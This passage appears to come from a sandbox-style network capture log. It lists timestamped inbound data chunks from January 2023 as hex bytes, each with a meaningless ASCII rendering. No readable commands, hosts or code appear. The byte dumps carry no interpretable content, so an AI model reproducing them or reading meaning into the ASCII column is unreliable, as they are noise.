                                                                                                                                                                                    2023-01-05 07:59:31 UTC19004INData Raw: 16 7a f3 97 7d 56 be e7 ee 2d 14 11 7a b0 84 91 ba 59 b0 2c 57 e2 44 eb e0 1e 9c 3f 37 8d b5 2b 74 76 0b dd 98 e3 18 57 25 59 98 90 01 28 ba 5e b1 54 87 50 f7 84 85 44 f7 4c 38 18 d3 37 8a b0 e8 38 c4 36 09 e2 20 5f 54 7a c7 b1 67 c3 72 a8 61 3b 21 d6 b5 25 85 ad 3e 4c a2 03 39 24 c4 80 7c ba e3 7d 4c 6e f4 c8 e6 94 b3 e8 17 a1 93 c8 94 29 a9 b5 9d 91 6e 20 4d 78 4c 71 70 5f 1b 8c 3c 38 92 f7 08 2b 1e eb 48 96 81 71 5c c3 78 1d fb 27 e8 97 43 aa 37 c9 2a da c5 5c fa 5e b9 8a 29 f2 81 5e 75 28 ae 89 bb 1c 1c 33 bf f2 68 65 76 33 7b 5c 40 0b d3 67 00 87 95 3d 97 c6 02 e2 fb 7f e4 85 af 1b cb bd 0f e1 7a 2f 47 44 ed d2 11 9a 7c 88 81 27 dc 00 bb cc fa d5 1e db 48 ca 7d bd 6b e3 bf e9 fa 51 ef c0 2b a0 f5 fa 67 6f f7 6f 15 87 89 8c 00 19 f2 b0 47 29 21 c6 0a
                                                                                                                                                                                    Data Ascii: z}V-zY,WD?7+tvW%Y(^TPDL8786 _Tzgra;!%>L9$|}Ln)n MxLqp_<8+Hq\x'C7*\^)^u(3hev3{\@g=z/GD|'H}kQ+gooG)!
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19020INData Raw: 7d 4a 13 d1 9f 88 58 a3 b0 73 ed 28 16 0d b1 1a 90 a7 5b 16 f6 0c 5f 39 ce 6a 04 5a 1e b7 dd ad 68 46 79 8d ef da b0 7c 44 c0 27 28 9a 60 fc 09 61 78 d7 e0 08 8c 8e 92 20 47 24 e7 ff a5 e8 d9 29 40 d9 ae 6e 08 52 0a 46 ca f9 ef 40 6a 02 4c f6 72 7f a9 f6 12 8d e0 b1 f6 95 5d 7d 96 0f 86 6d fa fe 33 0e f4 07 11 f8 fc bc ee 0b fe d0 bd 38 e0 9d f0 c8 43 9b bb 72 36 36 8e 7c a7 e6 43 3e f5 f8 bb 6d 21 a9 63 80 09 a5 ac b6 94 05 75 cc 2e 1a a8 77 7c 13 42 22 87 38 6d a2 fb 85 f5 02 9c 63 fc e8 2b 7c 3b 6e 53 c5 b9 0d c4 75 0f 1c 89 89 a8 fb fe 6d fe be 50 1c 2a 8f f0 b2 6f 9a 0a 5a 22 d9 d7 aa fe 5f b6 f0 c3 07 bf df 83 1e 96 52 62 00 ca 39 d7 2a 71 67 5b 68 b2 ea 33 27 a9 67 dc aa cd 4e 8e 2b f6 0e 61 f6 a8 bb d2 23 d3 70 b2 d5 dd 38 a2 40 a3 7c 33 87 31 e5
                                                                                                                                                                                    Data Ascii: }JXs([_9jZhFy|D'(`ax G$)@nRF@jLr]}m38Cr66|C>m!cu.w|B"8mc+|;nSumP*oZ"_Rb9*qg[h3'gN+a#p8@|31
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19036INData Raw: 1e 00 a4 f7 5a 18 c8 15 35 4d 26 f4 38 51 94 5f d7 27 15 8b e8 98 f7 87 65 65 ac 28 17 53 e9 59 ab ee 09 cc 44 32 49 7c 11 ff 17 47 74 df 5a 4a f7 27 9e af 0b 03 b6 48 65 99 25 7c 3c a9 44 d8 13 77 8b f0 4a a5 7b 9f 09 50 d8 23 47 95 9c 74 3a fc 98 da 96 36 5d 97 a5 b4 29 a0 f6 da 82 10 a0 56 e9 a1 41 e0 ca 80 e1 3d d3 6e f6 46 40 60 22 0d 68 cf 69 0e 8e ec 99 74 e6 c2 3c 0d be 5c f8 24 81 10 83 41 b1 1c c8 54 05 f4 f2 bf b9 2b 7b 37 01 43 72 6a 9b 98 3d db 06 71 ed a4 9a 28 fc ac 1e a6 86 41 ef 95 eb bb 7c e6 19 b6 53 6d 59 22 44 a5 8f fe 71 ff 77 8a 2f 29 db a1 92 09 cb 59 dc ea 86 18 d0 9c 77 44 1f 31 c8 ef 19 1b 8a 9f 63 8c 05 5a e6 f2 34 b7 dc 31 bd fb 1d 14 b8 bd df 2e e8 ab d5 83 f1 28 85 30 39 d5 b7 e3 96 aa 81 09 b2 9c 00 e0 ce e0 16 25 44 df 57
                                                                                                                                                                                    Data Ascii: Z5M&8Q_'ee(SYD2I|GtZJ'He%|<DwJ{P#Gt:6])VA=nF@`"hit<\$AT+{7Crj=q(A|SmY"Dqw/)YwD1cZ41.(09%DW
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19052INData Raw: f9 6f 98 aa a9 03 d9 02 5a be 5c 9e b8 22 d2 aa e1 9b 4c 14 72 75 b4 2a 1f 15 99 fb 26 81 e5 1e 88 93 bf 88 1a 51 fe 4b 44 eb 9b 39 eb bb 15 45 13 55 4d 97 e3 15 29 79 86 27 c3 63 4d 66 80 b7 3a e3 24 6c 7a 1f e8 08 65 47 65 2b 01 0e 11 9d 5b 7e b8 ed d5 96 a8 36 87 46 b2 2f fd f1 3e db 80 3b e1 9b 38 8d f1 34 26 07 1c c7 9b 81 67 2e 7f 50 70 3c 33 b5 09 4d bb 65 ff 5b bb 2e 48 12 e5 6b 8f b7 21 a8 75 6f 7e f0 30 24 68 77 7d 4b 63 bc 8c b6 1e f4 81 44 1d e9 87 21 2f 45 c1 5d b4 fd 7d 46 41 38 32 20 38 13 ea ec 53 23 07 3d e5 d0 ab a7 cf b9 4a e1 8e 55 9d 6a e7 21 be 4a 4b df 87 10 68 c8 78 24 13 0a d8 f9 d2 b4 60 d3 07 20 a5 4d ae c5 8d 25 6b 78 b5 80 f7 81 7a 5e 2b 52 b4 9c 56 d3 d3 9e ee 44 24 ef cd 32 47 b8 20 22 15 3d e4 56 1b 81 d1 e7 a6 3e 64 7f 93
                                                                                                                                                                                    Data Ascii: oZ\"Lru*&QKD9EUM)y'cMf:$lzeGe+[~6F/>;84&g.Pp<3Me[.Hk!uo~0$hw}KcD!/E]}FA82 8S#=JUj!JKhx$` M%kxz^+RVD$2G "=V>d
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19068INData Raw: d1 a4 6d 4f ed f6 65 ca f0 f3 74 2c 17 c8 fd 1b 66 3f 39 5d 11 07 bb 9b b0 fe d0 fc 3c e3 ce 4a 0e a5 37 f8 da 93 ad c8 2a 5a a7 3b cb f3 d0 10 72 96 54 0c e0 db 11 7c 30 03 77 49 90 ca b8 57 fa 05 61 28 14 60 ea 5b 57 d9 75 2e 44 81 39 ff ba 8a e4 4d 4a 8a 37 e4 90 34 32 b1 6e d7 e4 94 01 9e 10 60 8d f2 5d ea 41 e5 90 c6 77 96 e4 38 a4 43 ff 39 77 d1 26 91 ad 4d 31 10 05 3f 64 f8 2c 2d 35 0a 30 9b 8d 47 29 fc 5f 12 60 f0 b2 c2 cb 2f 35 0f 9e a4 45 0f b0 01 48 ab e7 8f 3b 79 e7 0e 0a 59 9e 4e 94 a5 fe 2c 2d 88 06 1b 58 36 ec 5b 5d 85 99 d0 ae 4b 4b 8e d1 a2 26 e8 30 78 64 c3 09 61 aa 0e 40 c9 57 3a 7f 06 f2 fd c0 4f 48 f4 27 49 d9 08 b4 70 11 ac 9a 46 77 19 36 79 af 6e 4e 9c 03 6f e5 87 e9 7d a1 3f ac 3a a8 1b 51 1e cb 16 c5 cb 7a e0 64 86 88 68 ec 30 d3
                                                                                                                                                                                    Data Ascii: mOet,f?9]<J7*Z;rT|0wIWa(`[Wu.D9MJ742n`]Aw8C9w&M1?d,-50G)_`/5EH;yYN,-X6[]KK&0xda@W:OH'IpFw6ynNo}?:Qzdh0
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19084INData Raw: a5 42 1e 4a c5 05 18 4a e4 b9 cc 3e 06 66 ec 81 e4 42 dc c8 e1 0d eb b9 7f a9 06 1a df b0 e5 74 19 be 5e 8e ed bf a5 12 3c e5 d4 25 f9 5f 75 4c 24 00 f2 20 f1 3a f7 bf c5 2c f0 82 be 3d 01 a8 3e 50 82 16 4b f0 0f 12 94 92 ef 69 d4 9e 9d 46 9e 6a 6f 0d 67 49 0b 08 7d 06 54 45 b6 14 fb 5b 42 a2 28 78 b5 7a fa c8 13 62 e4 70 6b a5 34 c7 24 6e ff 88 5e 71 57 89 f2 d1 62 bf 65 6b f5 70 69 61 97 f3 7a a7 cc 86 b9 0a bf cd 6b ba 1b 1a d7 e1 d3 bf f1 3e a9 8a 8a c1 b5 fc 0b 9a 72 82 b7 de 8c 9e af 21 1b 99 d2 97 ca 57 3b 90 cc 82 ad 7d 2a 42 ed d2 d4 f0 84 a7 04 f3 a8 0a 64 3b 01 c1 b9 83 d9 88 62 a3 15 69 82 a9 33 7e 35 2b 27 ce 1f 0c 82 bb 98 03 e3 34 3c 17 95 36 c1 46 93 46 c1 63 df c4 f7 f4 30 6c 20 38 e1 ea 04 8d ae 2e d2 a0 0f df e6 9f 84 a2 b8 29 43 71 c5
                                                                                                                                                                                    Data Ascii: BJJ>fBt^<%_uL$ :,=>PKiFjogI}TE[B(xzbpk4$n^qWbekpiazk>r!W;}*Bd;bi3~5+'4<6FFc0l 8.)Cq
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19100INData Raw: ff d2 1e 43 fd 3b 37 47 26 9c 21 c6 15 2d bd cc e1 dd 09 f2 04 c5 22 73 f7 55 0f c6 e6 80 d8 ee 7e fc a4 61 95 8b 41 56 b1 7a b8 a1 44 4a 87 d2 e9 ae 60 d9 1b a2 80 b7 49 34 30 ae 8c b2 5b f3 b9 31 e6 d0 15 05 b2 1e 99 31 15 f1 6f 63 5d f3 f4 3e d4 ae 85 0e 57 10 87 fb 5d 9c 3e 5e dd 58 2b b6 dc 11 14 78 35 97 42 ba 2f 48 db bb ea 49 97 ce c1 a6 a2 b8 d3 8b 65 58 2a 56 61 7f e0 aa f3 87 98 82 26 5d c2 0d f7 c4 3e fb de 49 4b 92 da d2 69 d4 b8 04 51 dc 50 e6 33 03 ad ae ed 1e 1e 0a 2b 5f f1 d9 3e 9e e4 ed e8 9f 59 a9 f7 a5 cb f0 74 a3 6c 4a ac 64 c0 20 35 e5 25 aa 11 29 48 22 aa 0c 14 4d 1b ba f6 ae ac 31 06 ce fe b5 a0 5f b0 fd fa db 18 db 32 21 8c 4f 27 84 a8 05 e2 b8 44 36 8e 61 ed 62 a6 b6 d9 2c de e9 db 71 e7 51 c9 37 bf e0 79 74 03 41 89 f5 a8 f1 ac
                                                                                                                                                                                    Data Ascii: C;7G&!-"sU~aAVzDJ`I40[11oc]>W]>^X+x5B/HIeX*Va&]>IKiQP3+_>YtlJd 5%)H"M1_2!O'D6ab,qQ7ytA
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19116INData Raw: 1f 6d 3e 84 c8 85 13 3a 94 4d 6d b2 06 54 02 1d 1c dd 10 cb cf ba dd 21 7f 3a 0f e2 d6 2c 56 36 88 13 53 93 6a ed 8b 55 57 22 4a 63 96 68 d9 c7 57 be 7c d9 fd 21 4e e2 74 53 de f6 d3 29 3d f5 3c ba ff 38 30 b3 be 64 41 42 00 37 a5 51 0e aa 3d f2 95 92 6a 23 74 42 7d a2 c7 82 dc fa 52 f6 d6 d8 22 07 84 21 2b 48 05 f0 1c f6 f4 02 c6 76 35 16 d5 0b 26 cb 0c 31 c5 9e 46 16 3d 08 d2 37 62 c1 98 9d 4d 50 6a 49 c6 82 21 0b fd 33 39 cc b8 a4 c3 e0 6b 75 ce bb f0 e0 e9 b7 ce 7a c5 49 af e5 7e 61 d9 2c 00 5b f8 31 a3 54 0c 49 56 6e 36 96 31 93 4e 3f 90 7e 24 d5 ad 1a a5 7c 72 24 eb 35 9e 0b ba 59 ff 49 8a e8 63 43 02 00 d3 5b 2e 7f 75 03 6b 86 9e a9 c4 58 83 b8 bc 11 ed 6f 11 db 50 18 49 28 c7 66 40 a9 bd b3 05 7f df cf 23 c1 a9 11 6d 94 2d d1 1f 4e e9 c5 85 37 8c
                                                                                                                                                                                    Data Ascii: m>:MmT!:,V6SjUW"JchW|!NtS)=<80dAB7Q=j#tB}R"!+Hv5&1F=7bMPjI!39kuzI~a,[1TIVn61N?~$|r$5YIcC[.ukXoPI(f@#m-N7
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19132INData Raw: 58 08 0a e4 df 92 91 09 5b 8f 05 b3 63 5c 58 52 4b be db 4f a0 c2 91 5a ee 24 3e aa 95 ec 79 40 be cb eb b8 18 e8 38 91 56 62 9d 99 90 d8 06 d6 2f 97 4d 95 fb b0 ad 28 60 4d 1d 3f 69 78 db ca 9c f2 8b c6 f3 5f e1 af d3 58 b1 af 47 5b 1b 10 83 34 fe 34 91 fb 9d 83 ad 39 5a c7 08 14 d9 3d 1b 8f d8 41 df ee a8 36 e1 69 27 55 c7 e0 0e ee a7 13 b8 be 1a 8b 2f b7 0b 48 d4 f9 da 29 8b b1 10 88 b0 1b eb 72 16 77 5f 88 64 38 26 13 c4 27 ba 6d 56 cc 7b fd fa 1e 05 c0 cd 9b 7b 7e 10 6f 17 30 9e 36 56 fe be 97 2c d0 a3 36 c5 01 71 cf fd 35 98 d3 7b a7 b5 6e 01 5d 8d d0 b9 bc 81 f2 90 ac 9b 14 d8 f5 70 95 d4 c7 29 16 78 91 51 c4 d6 8f 57 ed c1 3b 08 b1 fe cb af 5c ca 02 46 43 87 b9 4c 72 2a 02 d9 4c 25 bb ff 17 88 df 6e d7 ae 96 6f 07 ea ef e3 42 79 e2 e7 0e f8 64 6a
                                                                                                                                                                                    Data Ascii: X[c\XRKOZ$>y@8Vb/M(`M?ix_XG[449Z=A6i'U/H)rw_d8&'mV{{~o06V,6q5{n]p)xQW;\FCLr*L%noBydj
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19148INData Raw: 1e e0 00 03 73 88 10 5a 87 4e 4d 78 8e 5f e8 04 9f d3 3e ff 61 98 1b 93 7d c1 f5 d4 f8 08 dd 3a 2b ce ec 88 3d 75 cc 3a 90 1a 42 c6 59 31 42 c4 64 ed 07 ca 2e 0c 7f 6a 59 54 cf 87 4d 8a 79 01 9a 72 97 a4 2c 6c 4f 46 74 9e ae e1 0e 8d 06 11 1d a8 3c 4e 7c c5 b3 ba 9f 36 38 1c de 9d 90 11 27 ab fc 9a 65 bc 39 8e 77 87 5d d0 97 e2 b3 a1 72 54 f2 c8 b5 92 f1 10 52 70 c9 d2 0e bd 6d 9e 4d 7a 05 1a a8 70 66 ee 98 64 43 ff 72 48 b6 91 09 50 3e f1 16 24 a4 37 d4 89 f9 4a f5 6a 5c 11 c8 7f 86 ae 30 f5 94 88 a7 ce 56 11 f5 d0 02 92 5c 73 f5 ff 1b 5c 0f 59 85 86 58 de d7 b1 8e b6 9c a2 8a 85 6b ff af c6 55 e2 c5 3c 5f 1b fa d1 7d 61 63 ec e5 91 6b e9 08 67 6a 7a 21 f0 f0 de 0d d6 e0 8d 88 9e 4f be cd b0 d2 55 17 07 b9 a9 8a 8e 0f 4c 9d dc 6b 41 42 9b d4 69 09 f4 12
                                                                                                                                                                                    Data Ascii: sZNMx_>a}:+=u:BY1Bd.jYTMyr,lOFt<N|68'e9w]rTRpmMzpfdCrHP>$7Jj\0V\s\YXkU<_}ackgjz!OULkABi
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19164INData Raw: e0 62 cb 1e d5 fd 1c cb 1d fc d6 69 28 a6 14 34 65 24 6e 23 84 4f 7c dd 02 e1 1b 04 8b f3 4c 91 1d 78 7d 9c f9 87 6d 9c 33 72 1d 4f 41 b6 98 e5 f7 27 99 a1 90 f3 6b d3 11 a6 2d 6d 05 cc 3d ae e0 d4 bc 7e 0a 68 39 21 3e 36 cf 69 e9 85 7a 2d 1d 31 27 6c e9 b4 81 3b 22 77 3e b2 62 40 8a 72 54 57 d7 52 b0 f4 55 7b 11 ad d5 c2 40 5d d2 68 a1 93 f3 d2 00 4f 32 8f 2f 7a 6d 03 19 ab 46 d7 b4 f3 e5 c0 3d d0 4e 65 77 2a 5a 19 92 33 da d3 f0 6f 38 d0 19 29 59 d7 f4 c1 7c 37 ca b8 48 38 b1 4b e1 5e 65 67 18 b6 17 10 70 93 49 c9 dd df 39 b7 e7 ef d0 0e ea d1 1b 1c 68 06 47 df 0a fe 9f b0 5a 14 a8 30 7a e3 42 e5 9b 26 c4 52 1d 51 51 f6 e4 43 c4 5c f6 72 e6 77 6a 5f 01 c7 07 47 90 8c 59 a7 67 5a 7b f7 39 34 6a 12 b9 03 b4 7b bb 69 6d 37 e8 5d c4 a2 49 28 a9 75 07 cd a5
                                                                                                                                                                                    Data Ascii: bi(4e$n#O|Lx}m3rOA'k-m=~h9!>6iz-1'l;"w>b@rTWRU{@]hO2/zmF=New*Z3o8)Y|7H8K^egpI9hGZ0zB&RQQC\rwj_GYgZ{94j{im7]I(u
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19180INData Raw: 81 99 a9 fa 0e a7 80 67 e9 ab c5 38 25 34 59 5e 28 3e d5 e1 c4 42 cd cb e7 1b 89 4e 1d b2 ff cf 69 6c 53 c7 bd fb cb 7f 53 5d 6d 14 c7 24 fe cf d8 86 0f 3e bc 7b bf c9 10 c3 ec 94 b0 3d 78 42 38 ae 1e 66 d0 d1 07 06 d2 53 ff 07 03 0e d5 e6 39 6d 09 c7 72 da 14 6b 2f 29 51 4e a1 61 bf 8e 3a 84 d0 f0 16 c9 35 53 40 90 2a 95 07 ed 58 b6 92 7f 47 1a 63 0c b9 fd 44 0f a5 63 67 00 47 b2 6e 05 2b fa 95 18 66 57 41 1b 7a 5e 88 c4 f9 14 be 48 4a 3d 86 2a 55 3b f1 69 36 6a 93 c3 0c d6 c2 11 82 35 d4 8e ff 8b 52 ae d9 76 d2 b2 91 67 30 17 52 d2 08 bb b1 c1 a6 47 53 26 70 1f da f3 2d 6c 45 a3 e1 f4 b6 a9 93 4d 36 95 4e c5 58 bf e7 50 f5 31 52 ed 09 72 3b 34 24 0c 5c 60 93 3c 53 de a2 15 aa f4 b9 fa cd da 5d 86 43 33 2b de 83 72 c9 6c b5 59 80 2d 9e 02 47 60 c6 26 b2
                                                                                                                                                                                    Data Ascii: g8%4Y^(>BNilSS]m$>{=xB8fS9mrk/)QNa:5S@*XGcDcgGn+fWAz^HJ=*U;i6j5Rvg0RGS&p-lEM6NXP1Rr;4$\`<S]C3+rlY-G`&
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19196INData Raw: 3e 52 ad d7 7f 15 6c df 21 0f 85 0c a2 52 1f 5b 2e 10 cc 21 38 8c e5 c6 cf de ae 48 7e 2c 3c 0a fa 19 57 26 79 ed 65 9b cf 5c 54 54 14 ef f8 a2 8c ed df f4 b9 2d 25 64 49 6b 0f 02 67 e0 3b 48 37 34 7d 55 f2 b7 5a e5 d5 7d 01 81 7c c4 bc be b4 c6 10 b2 85 1d df 85 cd bd eb ea f4 5d a8 9a e3 60 ae 19 0a ec 9a 38 8a c9 5f 88 76 4a 9a 3d 77 07 5f df 47 4a 77 a8 a5 e7 24 e5 5a 0c 7e b1 eb 3c 68 a0 23 4a 56 b6 e8 65 47 1b a9 04 5a 7d 8d 98 e1 23 f2 15 fc 45 46 f3 77 6d d0 cf 70 5b 6d 74 a4 51 11 ea ad 43 34 46 1e 02 69 1e ab a7 25 7f 0d 12 a9 53 34 45 8e 9c 25 bc aa e1 57 d3 82 9c fa 01 08 8e db 25 91 37 47 a1 eb a7 11 87 16 83 05 e9 44 aa 9e 26 92 ca e3 4d 56 16 8b 41 49 f7 93 51 34 bf b9 b9 89 ac 3f 32 11 e9 1d 5d f3 66 e2 02 d1 b0 99 2e 6a 5b c7 62 58 e1 f7
                                                                                                                                                                                    Data Ascii: >Rl!R[.!8H~,<W&ye\TT-%dIkg;H74}UZ}|]`8_vJ=w_GJw$Z~<h#JVeGZ}#EFwmp[mtQC4Fi%S4E%W%7GD&MVAIQ4?2]f.j[bX
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19212INData Raw: 3e 7f 73 25 ec af 3a 85 cd e2 e0 0d 50 81 84 42 76 41 6e 65 ba da cf 11 0e ea 34 6f f0 4a 85 ab 7c 0d 92 c9 3d 35 58 c8 ff ee d9 01 5f 29 45 b7 47 8f b3 4a 75 a2 be b0 2c dd 21 d6 fc 96 01 dd 8b c7 c2 7f 8f 64 2a 60 e1 c2 3b 75 63 75 cc 5d c4 90 34 e9 48 7a 86 3b f8 47 bf 83 4c cc 77 28 71 99 aa ad fc f9 1d e9 63 f2 b0 1f 97 b7 be 96 d7 5e 2d 17 89 76 c1 5a f2 1b 06 33 07 df 23 0c 24 b6 8e 28 5e 31 7d cc 95 7d 07 03 dd c4 ff 3a 80 aa 19 17 17 c5 e7 36 0f ab 25 42 f9 28 4b ff 55 50 79 51 26 33 d9 90 29 43 bb 55 c9 dd 94 15 0b c6 66 22 58 d7 3a dd 39 77 0c 3d aa be c6 61 7d e7 d3 8e 97 c7 32 c0 d2 f5 16 62 3f 12 0d 34 d4 8c 27 ee fa 4b 8a 10 0e 3d 0d 0f 6e b2 50 61 3d e9 cc 96 59 1e ed 51 20 57 6a 37 0e fc 1b f9 94 a2 61 bb bc c3 bc 8e 69 e8 9f 10 a6 c6 29
                                                                                                                                                                                    Data Ascii: >s%:PBvAne4oJ|=5X_)EGJu,!d*`;ucu]4Hz;GLw(qc^-vZ3#$(^1}}:6%B(KUPyQ&3)CUf"X:9w=a}2b?4'K=nPa=YQ Wj7ai)
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19228INData Raw: 0d f9 e5 b8 27 04 89 cd e1 4a da 40 34 40 ca d5 85 93 62 57 c4 4d 6c f6 fe 70 a1 92 95 1d 56 e4 68 13 6b 64 cd f7 b2 93 ae 0e 2b e0 37 2d c4 e3 23 5b f3 b5 9e 25 4b bd e3 ea 7a 96 42 d4 f1 dd f5 7d 06 5d 49 ce 93 a3 ec 9f 58 02 a6 46 3c a6 6e 91 19 0d 59 3e 42 8e e8 fa 91 7f 07 3b ec f3 83 c1 bd d4 6a 5a df 3f 2e 7a 9a 78 12 ac 62 3a cd f8 7b ff 4a 6d b1 c4 b8 b3 29 80 fc e4 9e 3c 72 4a 65 71 6f e3 ee 68 eb 67 f0 7b 62 d6 58 a7 1c 08 3e 13 6b b7 be 10 20 f2 ea d0 bf ba ab 17 5e 54 c9 15 55 5b d5 9c 32 68 e4 6e 6c b0 19 e7 bb 7a a6 4d 72 41 3c 2c e7 f1 cd a0 aa bf d8 97 6a 7b b2 c6 ac 30 87 c8 52 47 fa 2c 12 aa 92 c4 26 79 73 98 be f1 f7 c9 0f 7f 47 bf e1 78 c4 63 1a 93 fa d1 ad 2d 25 df b9 1b 7b 0a bf 5b cb 14 c4 a1 6f ea 97 87 46 f7 a1 9f 5c 7a 4e ba de
                                                                                                                                                                                    Data Ascii: 'J@4@bWMlpVhkd+7-#[%KzB}]IXF<nY>B;jZ?.zxb:{Jm)<rJeqohg{bX>k ^TU[2hnlzMrA<,j{0RG,&ysGxc-%{[oF\zN
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19244INData Raw: 82 6c 09 2e 5f 3c 16 6a d8 64 dd fa a9 93 6a 85 46 15 50 2e 0f 37 71 9b 6e 98 df 5a e1 f4 4a d2 f1 9b ed d1 e7 48 a9 57 6e ae 8d c3 ba e2 bb e6 7c 63 b5 af 40 e1 a3 51 a8 cd f7 93 38 30 36 4b 49 fc 08 79 21 d7 05 c1 28 c0 3b 3d 73 69 ee 2c 9e 8c 3f d2 4e 87 0a 79 8c 96 25 a2 95 2a 16 7b b8 4a d4 34 b4 40 be 6b 90 69 c8 88 c9 bd 91 38 7d 78 bf 5f c1 ff b1 c1 19 ae 91 cc 60 49 08 0a 89 61 7d af cc 19 25 bf 1e f3 09 af 48 50 9b d7 5a 7c d9 18 f7 eb 8b 68 fb d5 46 72 91 72 76 4a 54 5e db 4b 4d 0f 88 0f d5 1a 2e f0 f7 14 95 4c fa ec db f0 a9 8f a3 dc c9 db b8 b0 f2 89 5c e1 0e 48 50 81 43 58 6b b5 49 c0 16 8d a2 2a 5e 38 36 7f a1 df 99 b4 c3 92 ab 70 6c 8c e8 d8 c4 47 f3 71 95 8a 74 02 3a 55 79 41 1a 71 0f f0 29 9b a0 bd 15 a9 2f f4 90 60 38 ba eb e7 dd 94 d8
                                                                                                                                                                                    Data Ascii: l._<jdjFP.7qnZJHWn|c@Q806KIy!(;=si,?Ny%*{J4@ki8}x_`Ia}%HPZ|hFrrvJT^KM.L\HPCXkI*^86plGqt:UyAq)/`8
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19260INData Raw: bd 23 12 c7 c2 e3 50 78 bb b0 0a 9d 0a 47 c1 f1 58 c4 62 35 8d 8f 87 2b 5c 6d fa bc cd c2 56 87 21 09 b9 ed 68 6d 20 38 28 fa ac f7 f9 35 90 9a 8b 2b 22 ea 27 93 5a 09 d1 e5 f0 55 86 5a 73 0a 8d 10 da 94 90 7c 52 88 72 47 e4 53 97 a0 a2 3c de 73 0c 40 98 18 bb 43 e8 49 9d e7 4b 46 da ae d7 32 f4 68 dc ca e1 68 50 85 88 d2 bb 15 49 49 8a 2b b8 f3 51 29 25 22 cb 99 d6 2d 8c cb aa 61 3c 5a 8a 07 3b a9 ad 8d a2 86 18 fe bc d4 8f 23 96 8b 7e 86 06 d9 14 75 ca 3c e9 e4 cf 54 d3 04 24 31 0e c1 fa cc fa 45 14 dc b6 c7 17 05 34 be 8f 5b 29 ee 06 66 79 cd f4 a6 c9 c4 be ed 6a 1e d7 de 8d 8e ed 72 67 c3 66 21 27 54 26 27 c2 fc 50 62 c9 58 f0 e2 fe 35 48 6e e1 83 a2 5f 34 57 37 74 ad a3 8e cc cb 24 9c 59 ee 7c 85 b3 09 d1 ca f1 52 86 43 d0 33 6a e5 7b 4f d4 50 18 f0
                                                                                                                                                                                    Data Ascii: #PxGXb5+\mV!hm 8(5+"'ZUZs|RrGS<s@CIKF2hhPII+Q)%"-a<Z;#~u<T$1E4[)fyjrgf!'T&'PbX5Hn_4W7t$Y|RC3j{OP
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19276INData Raw: 4f 18 3b ff bd 6b cf 4d 08 97 c2 c5 b8 50 e4 b5 c3 8a d6 3c 95 7e 35 04 c1 19 43 4c ea fd e7 43 fa 6b ba ea 72 16 38 31 60 b4 d3 15 59 0e 04 c5 01 84 8e 3c 87 50 f4 30 63 98 a0 88 85 8d 9c 8a 23 42 c8 1b 4e c9 78 fe dd 4d 9c 00 5f aa 1c eb 9c e5 a6 1a 33 ad a4 15 6a 41 0b b6 60 3b 67 1e b3 a6 2f 18 64 75 89 af b8 7a 61 84 95 54 a8 a1 c0 dd 1b c2 f2 02 0b b2 34 69 56 cb 32 11 29 85 4e 75 58 cc f3 0b e6 d2 eb 44 11 52 a9 25 4e 5e 9c 1b 96 34 79 99 d6 f2 22 2e 11 87 3d 71 84 20 c7 f1 29 42 07 0a 78 3b 40 e9 cb 63 42 f2 08 22 f7 2a 31 7b 29 c2 e4 7e 5d 38 02 fe 82 8d 41 4d 77 3e 2f b3 29 1a 09 12 83 57 3c b8 35 c8 96 9b 87 c3 47 66 bd fb dd ec 24 9e b2 c3 c8 d8 29 71 e3 a1 7f 3b 3d 43 e1 c2 65 70 29 d0 9b fb 91 15 c7 37 65 47 b0 7e e9 61 bb 43 db 64 d9 fb e3
                                                                                                                                                                                    Data Ascii: O;kMP<~5CLCkr81`Y<P0c#BNxM_3jA`;g/duzaT4iV2)NuXDR%N^4y".=q )Bx;@cB"*1{)~]8AMw>/)W<5Gf$)q;=Cep)7eG~aCd
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19292INData Raw: 2d 9b b6 3b 53 fa 2e 3d f3 d5 45 3e cd fd b8 30 bb 88 4d e2 55 87 f6 b2 f6 6c 00 81 b7 37 2a 9d cf 14 86 1e 40 ce 57 18 a1 49 b3 dd 52 16 96 ff 81 6a 20 73 3e e7 83 ac da 66 85 00 37 51 45 ee 06 50 c4 8b 96 06 b7 b7 3f 7e f4 13 d3 ec 0b e7 13 8e cf d7 aa 4e f0 1d cd 98 f2 4a fa a8 3c 52 a4 d4 ce 34 f3 82 d9 69 04 f3 f3 18 90 97 3d ec 40 36 0d b4 8a 6e 52 58 9d 84 e6 5e b8 f9 b8 fd 40 91 70 b6 93 b9 26 26 6b 96 9a 83 70 83 6f d9 a0 25 cb 3e b1 63 de ff 96 ad ea d8 3f 10 e7 d5 6c d4 4b 68 0d 45 5f 93 58 f7 35 91 d5 ae 8f 63 5c 5c 58 3d 9d 14 65 24 20 b9 08 1a 90 5b 7a 07 03 fb e1 52 ad 7d d9 8b f8 77 c2 f8 e3 02 f9 a1 cd 7f a6 04 15 b1 c7 60 84 a3 f2 65 db fc 37 96 85 fb 7f 44 29 00 a0 05 00 55 48 44 56 76 f0 96 94 af 1d 4b ab 7b 83 b9 cf f1 a4 e0 e8 85 67
                                                                                                                                                                                    Data Ascii: -;S.=E>0MUl7*@WIRj s>f7QEP?~NJ<R4i=@6nRX^@p&&kpo%>c?lKhE_X5c\\X=e$ [zR}w`e7D)UHDVvK{g
